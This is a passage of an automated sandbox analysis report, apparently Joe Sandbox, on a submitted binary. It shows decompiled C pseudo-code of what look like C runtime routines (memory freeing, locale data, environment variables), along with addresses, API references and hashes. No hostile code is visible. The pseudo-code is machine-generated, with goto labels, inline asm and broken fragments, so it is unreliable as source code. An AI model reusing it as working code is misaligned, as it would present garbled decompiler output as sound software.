				_push( &_v20);
				E00A03EE4(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00A03F4F(_t67, _t72, _t73, _t77);
			}














                                                                                                                                                                          0x00a040b8
                                                                                                                                                                          0x00a040b8
                                                                                                                                                                          0x00a040b8
                                                                                                                                                                          0x00a040bd
                                                                                                                                                                          0x00a040c3
                                                                                                                                                                          0x00a040c5
                                                                                                                                                                          0x00a040cb
                                                                                                                                                                          0x00a040ce
                                                                                                                                                                          0x00a040d3
                                                                                                                                                                          0x00a040d6
                                                                                                                                                                          0x00a040da
                                                                                                                                                                          0x00a040e5
                                                                                                                                                                          0x00a040f0
                                                                                                                                                                          0x00a040fb
                                                                                                                                                                          0x00a04106
                                                                                                                                                                          0x00a04111
                                                                                                                                                                          0x00a0411c
                                                                                                                                                                          0x00a04127
                                                                                                                                                                          0x00a04135
                                                                                                                                                                          0x00a04140
                                                                                                                                                                          0x00a04148
                                                                                                                                                                          0x00a04149
                                                                                                                                                                          0x00a0414c
                                                                                                                                                                          0x00a04152
                                                                                                                                                                          0x00a04156
                                                                                                                                                                          0x00a0415a
                                                                                                                                                                          0x00a0415b
                                                                                                                                                                          0x00a04165
                                                                                                                                                                          0x00a0416b
                                                                                                                                                                          0x00a0416c
                                                                                                                                                                          0x00a0416f
                                                                                                                                                                          0x00a04175
                                                                                                                                                                          0x00a04179
                                                                                                                                                                          0x00a0417d
                                                                                                                                                                          0x00a04184

                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A040CE
                                                                                                                                                                            • Part of subcall function 00A0447F: HeapFree.KERNEL32(00000000,00000000,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?), ref: 00A04495
                                                                                                                                                                            • Part of subcall function 00A0447F: GetLastError.KERNEL32(?,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?,?), ref: 00A044A7
                                                                                                                                                                          • _free.LIBCMT ref: 00A040DA
                                                                                                                                                                          • _free.LIBCMT ref: 00A040E5
                                                                                                                                                                          • _free.LIBCMT ref: 00A040F0
                                                                                                                                                                          • _free.LIBCMT ref: 00A040FB
                                                                                                                                                                          • _free.LIBCMT ref: 00A04106
                                                                                                                                                                          • _free.LIBCMT ref: 00A04111
                                                                                                                                                                          • _free.LIBCMT ref: 00A0411C
                                                                                                                                                                          • _free.LIBCMT ref: 00A04127
                                                                                                                                                                          • _free.LIBCMT ref: 00A04135
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 4bccfbb537770931c5e9e4a90ef2201b4b651210b535951254fee06b30aa401e
                                                                                                                                                                          • Instruction ID: adce7206a8982048d978aee3cab3af3814451708ff2fba97a4848b2343163029
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bccfbb537770931c5e9e4a90ef2201b4b651210b535951254fee06b30aa401e
                                                                                                                                                                          • Instruction Fuzzy Hash: CC2166B690011CAFCB41EF94D981DDE7BB9BF18340F0181A6FB559B161DB32EA59CB80
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0D0BD Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                          			E00A0D0BD(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00A04422(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E00A04E1F(4);
						_t120 = 0;
						_v8 = _t125;
						E00A0447F(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0xa44bf0; // 0xa44c44
								 *_t93 = _t53;
								_t54 =  *0xa44bf4; // 0xa46238
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0xa44bf8; // 0xa46238
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0xa44c20; // 0xa44c48
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0xa44c24; // 0xa4623c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E00A04E1F(4);
							_v12 = _t121;
							E00A0447F(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E00A06F5A(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E00A06F5A(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E00A06F5A(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E00A06F5A(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E00A06F5A(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E00A0D054(_t93);
								E00A0447F(_t93);
								E00A0447F(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E00A0447F(_v8);
								return _v16;
							}
							E00A0447F();
							goto L12;
						}
						E00A0447F(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0xa44bf0;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E00A0447F( *((intOrPtr*)(_t123 + 0x7c)));
							E00A0447F( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}






























                                                                                                                                                                          0x00a0d0bd
                                                                                                                                                                          0x00a0d0c7
                                                                                                                                                                          0x00a0d0cd
                                                                                                                                                                          0x00a0d0d0
                                                                                                                                                                          0x00a0d0d9
                                                                                                                                                                          0x00a0d0f8
                                                                                                                                                                          0x00a0d100
                                                                                                                                                                          0x00a0d106
                                                                                                                                                                          0x00a0d119
                                                                                                                                                                          0x00a0d11a
                                                                                                                                                                          0x00a0d123
                                                                                                                                                                          0x00a0d125
                                                                                                                                                                          0x00a0d128
                                                                                                                                                                          0x00a0d12b
                                                                                                                                                                          0x00a0d134
                                                                                                                                                                          0x00a0d145
                                                                                                                                                                          0x00a0d147
                                                                                                                                                                          0x00a0d150
                                                                                                                                                                          0x00a0d29f
                                                                                                                                                                          0x00a0d2a4
                                                                                                                                                                          0x00a0d2a6
                                                                                                                                                                          0x00a0d2ab
                                                                                                                                                                          0x00a0d2ae
                                                                                                                                                                          0x00a0d2b3
                                                                                                                                                                          0x00a0d2b6
                                                                                                                                                                          0x00a0d2bb
                                                                                                                                                                          0x00a0d2be
                                                                                                                                                                          0x00a0d2c3
                                                                                                                                                                          0x00a0d232
                                                                                                                                                                          0x00a0d238
                                                                                                                                                                          0x00a0d23c
                                                                                                                                                                          0x00a0d23e
                                                                                                                                                                          0x00a0d23e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d23c
                                                                                                                                                                          0x00a0d15d
                                                                                                                                                                          0x00a0d161
                                                                                                                                                                          0x00a0d164
                                                                                                                                                                          0x00a0d16b
                                                                                                                                                                          0x00a0d16e
                                                                                                                                                                          0x00a0d17b
                                                                                                                                                                          0x00a0d181
                                                                                                                                                                          0x00a0d18d
                                                                                                                                                                          0x00a0d192
                                                                                                                                                                          0x00a0d1a1
                                                                                                                                                                          0x00a0d1a8
                                                                                                                                                                          0x00a0d1b5
                                                                                                                                                                          0x00a0d1c9
                                                                                                                                                                          0x00a0d1d3
                                                                                                                                                                          0x00a0d1ea
                                                                                                                                                                          0x00a0d216
                                                                                                                                                                          0x00a0d226
                                                                                                                                                                          0x00a0d226
                                                                                                                                                                          0x00a0d22a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d21b
                                                                                                                                                                          0x00a0d21b
                                                                                                                                                                          0x00a0d221
                                                                                                                                                                          0x00a0d28d
                                                                                                                                                                          0x00a0d225
                                                                                                                                                                          0x00a0d225
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d225
                                                                                                                                                                          0x00a0d28f
                                                                                                                                                                          0x00a0d291
                                                                                                                                                                          0x00a0d291
                                                                                                                                                                          0x00a0d294
                                                                                                                                                                          0x00a0d296
                                                                                                                                                                          0x00a0d299
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d29d
                                                                                                                                                                          0x00a0d223
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d223
                                                                                                                                                                          0x00a0d22c
                                                                                                                                                                          0x00a0d22f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d22f
                                                                                                                                                                          0x00a0d1ed
                                                                                                                                                                          0x00a0d1f3
                                                                                                                                                                          0x00a0d1fb
                                                                                                                                                                          0x00a0d203
                                                                                                                                                                          0x00a0d207
                                                                                                                                                                          0x00a0d20b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d213
                                                                                                                                                                          0x00a0d170
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d175
                                                                                                                                                                          0x00a0d137
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d13f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d0e3
                                                                                                                                                                          0x00a0d0e3
                                                                                                                                                                          0x00a0d0e5
                                                                                                                                                                          0x00a0d0e8
                                                                                                                                                                          0x00a0d240
                                                                                                                                                                          0x00a0d240
                                                                                                                                                                          0x00a0d248
                                                                                                                                                                          0x00a0d24a
                                                                                                                                                                          0x00a0d24a
                                                                                                                                                                          0x00a0d252
                                                                                                                                                                          0x00a0d257
                                                                                                                                                                          0x00a0d25b
                                                                                                                                                                          0x00a0d260
                                                                                                                                                                          0x00a0d26b
                                                                                                                                                                          0x00a0d271
                                                                                                                                                                          0x00a0d25b
                                                                                                                                                                          0x00a0d275
                                                                                                                                                                          0x00a0d27a
                                                                                                                                                                          0x00a0d280
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d280

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 2a14d51ee89bead320a2f4903f0990990eccdac1b5fefdc2c3e600c2b0b16bbf
                                                                                                                                                                          • Instruction ID: f05eaaafc38b46af9cc94c6ef28a27415bdebd5c9be17fa6bb33c7edede95510
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a14d51ee89bead320a2f4903f0990990eccdac1b5fefdc2c3e600c2b0b16bbf
                                                                                                                                                                          • Instruction Fuzzy Hash: DD61D4729003099FDB20DFA4E981BAAB7F5BF48310F104559EA59EB2C1EB71DD018B50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0C562 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                          			E00A0C562(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00A13820(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E009FEBAB(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0xa464b8 - _t110; // 0xb77140
							if(__eflags != 0) {
								L14:
								_t64 =  *0xa464b8; // 0xb77140
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00A0C86A(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00A0EE63(_t120, _t139, 4);
													E00A0447F(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00A0447F( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00A0EE63(_t139, _t138, 4);
												E00A0447F(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0xa464b8 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00A04422(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00A0447F(_t149);
													goto L40;
												} else {
													_t76 = E00A03503(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E009FCBFC();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00A04422(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00A007E9(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00A0447F(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00A04422(_t53, 1);
																		E00A0447F(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00A03503( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E009FCBFC();
																				asm("int3");
																				_t84 =  *0xa464b8; // 0xb77140
																				__eflags = _t84 -  *0xa464c4; // 0xb77140
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0xa464b8 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E00A12124(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E009FEBAB(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0xa464b8 = E00A04422(1, 4);
										E00A0447F(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0xa464b8 - _t110; // 0xb77140
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0xa464bc - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0xa464bc = E00A04422(1, 4);
												E00A0447F(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0xa464bc - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00A0447F(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0xa464bc - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L00A01493();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E009FEBAB(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}










































                                                                                                                                                                          0x00a0c562
                                                                                                                                                                          0x00a0c565
                                                                                                                                                                          0x00a0c567
                                                                                                                                                                          0x00a0c56b
                                                                                                                                                                          0x00a0c56e
                                                                                                                                                                          0x00a0c570
                                                                                                                                                                          0x00a0c585
                                                                                                                                                                          0x00a0c58a
                                                                                                                                                                          0x00a0c58c
                                                                                                                                                                          0x00a0c591
                                                                                                                                                                          0x00a0c596
                                                                                                                                                                          0x00a0c598
                                                                                                                                                                          0x00a0c779
                                                                                                                                                                          0x00a0c77e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c59e
                                                                                                                                                                          0x00a0c59e
                                                                                                                                                                          0x00a0c5a0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c5a6
                                                                                                                                                                          0x00a0c5a9
                                                                                                                                                                          0x00a0c5ac
                                                                                                                                                                          0x00a0c5b1
                                                                                                                                                                          0x00a0c5b3
                                                                                                                                                                          0x00a0c5b9
                                                                                                                                                                          0x00a0c636
                                                                                                                                                                          0x00a0c636
                                                                                                                                                                          0x00a0c63b
                                                                                                                                                                          0x00a0c63e
                                                                                                                                                                          0x00a0c640
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c646
                                                                                                                                                                          0x00a0c64d
                                                                                                                                                                          0x00a0c652
                                                                                                                                                                          0x00a0c657
                                                                                                                                                                          0x00a0c65a
                                                                                                                                                                          0x00a0c65c
                                                                                                                                                                          0x00a0c6ad
                                                                                                                                                                          0x00a0c6ad
                                                                                                                                                                          0x00a0c6b0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c6b6
                                                                                                                                                                          0x00a0c6b6
                                                                                                                                                                          0x00a0c6b8
                                                                                                                                                                          0x00a0c6bb
                                                                                                                                                                          0x00a0c6bb
                                                                                                                                                                          0x00a0c6be
                                                                                                                                                                          0x00a0c6c0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c6c6
                                                                                                                                                                          0x00a0c6c6
                                                                                                                                                                          0x00a0c6cc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c6d2
                                                                                                                                                                          0x00a0c6dc
                                                                                                                                                                          0x00a0c6df
                                                                                                                                                                          0x00a0c6e4
                                                                                                                                                                          0x00a0c6e7
                                                                                                                                                                          0x00a0c6ea
                                                                                                                                                                          0x00a0c6ec
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c6f2
                                                                                                                                                                          0x00a0c6f2
                                                                                                                                                                          0x00a0c6f5
                                                                                                                                                                          0x00a0c6f7
                                                                                                                                                                          0x00a0c6fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c6fa
                                                                                                                                                                          0x00a0c6ec
                                                                                                                                                                          0x00a0c6cc
                                                                                                                                                                          0x00a0c6c0
                                                                                                                                                                          0x00a0c65e
                                                                                                                                                                          0x00a0c65e
                                                                                                                                                                          0x00a0c660
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c662
                                                                                                                                                                          0x00a0c665
                                                                                                                                                                          0x00a0c66b
                                                                                                                                                                          0x00a0c66e
                                                                                                                                                                          0x00a0c671
                                                                                                                                                                          0x00a0c6a6
                                                                                                                                                                          0x00a0c6a8
                                                                                                                                                                          0x00a0c673
                                                                                                                                                                          0x00a0c673
                                                                                                                                                                          0x00a0c680
                                                                                                                                                                          0x00a0c680
                                                                                                                                                                          0x00a0c683
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c67c
                                                                                                                                                                          0x00a0c67f
                                                                                                                                                                          0x00a0c67f
                                                                                                                                                                          0x00a0c67f
                                                                                                                                                                          0x00a0c68f
                                                                                                                                                                          0x00a0c692
                                                                                                                                                                          0x00a0c697
                                                                                                                                                                          0x00a0c69a
                                                                                                                                                                          0x00a0c69d
                                                                                                                                                                          0x00a0c69f
                                                                                                                                                                          0x00a0c6fe
                                                                                                                                                                          0x00a0c6fe
                                                                                                                                                                          0x00a0c6fe
                                                                                                                                                                          0x00a0c69f
                                                                                                                                                                          0x00a0c703
                                                                                                                                                                          0x00a0c706
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c708
                                                                                                                                                                          0x00a0c708
                                                                                                                                                                          0x00a0c70b
                                                                                                                                                                          0x00a0c70b
                                                                                                                                                                          0x00a0c70d
                                                                                                                                                                          0x00a0c70e
                                                                                                                                                                          0x00a0c70e
                                                                                                                                                                          0x00a0c71a
                                                                                                                                                                          0x00a0c722
                                                                                                                                                                          0x00a0c725
                                                                                                                                                                          0x00a0c726
                                                                                                                                                                          0x00a0c728
                                                                                                                                                                          0x00a0c770
                                                                                                                                                                          0x00a0c771
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c72a
                                                                                                                                                                          0x00a0c731
                                                                                                                                                                          0x00a0c736
                                                                                                                                                                          0x00a0c739
                                                                                                                                                                          0x00a0c73b
                                                                                                                                                                          0x00a0c795
                                                                                                                                                                          0x00a0c796
                                                                                                                                                                          0x00a0c797
                                                                                                                                                                          0x00a0c798
                                                                                                                                                                          0x00a0c799
                                                                                                                                                                          0x00a0c79a
                                                                                                                                                                          0x00a0c79f
                                                                                                                                                                          0x00a0c7a2
                                                                                                                                                                          0x00a0c7a6
                                                                                                                                                                          0x00a0c7a7
                                                                                                                                                                          0x00a0c7aa
                                                                                                                                                                          0x00a0c7ac
                                                                                                                                                                          0x00a0c7b3
                                                                                                                                                                          0x00a0c7b5
                                                                                                                                                                          0x00a0c7b7
                                                                                                                                                                          0x00a0c7b9
                                                                                                                                                                          0x00a0c7bb
                                                                                                                                                                          0x00a0c7bb
                                                                                                                                                                          0x00a0c7be
                                                                                                                                                                          0x00a0c7bf
                                                                                                                                                                          0x00a0c7bf
                                                                                                                                                                          0x00a0c7bb
                                                                                                                                                                          0x00a0c7c5
                                                                                                                                                                          0x00a0c7d0
                                                                                                                                                                          0x00a0c7d3
                                                                                                                                                                          0x00a0c7d4
                                                                                                                                                                          0x00a0c7d6
                                                                                                                                                                          0x00a0c83e
                                                                                                                                                                          0x00a0c83e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c7d8
                                                                                                                                                                          0x00a0c7d8
                                                                                                                                                                          0x00a0c7da
                                                                                                                                                                          0x00a0c7dc
                                                                                                                                                                          0x00a0c82e
                                                                                                                                                                          0x00a0c830
                                                                                                                                                                          0x00a0c836
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c7de
                                                                                                                                                                          0x00a0c7de
                                                                                                                                                                          0x00a0c7e1
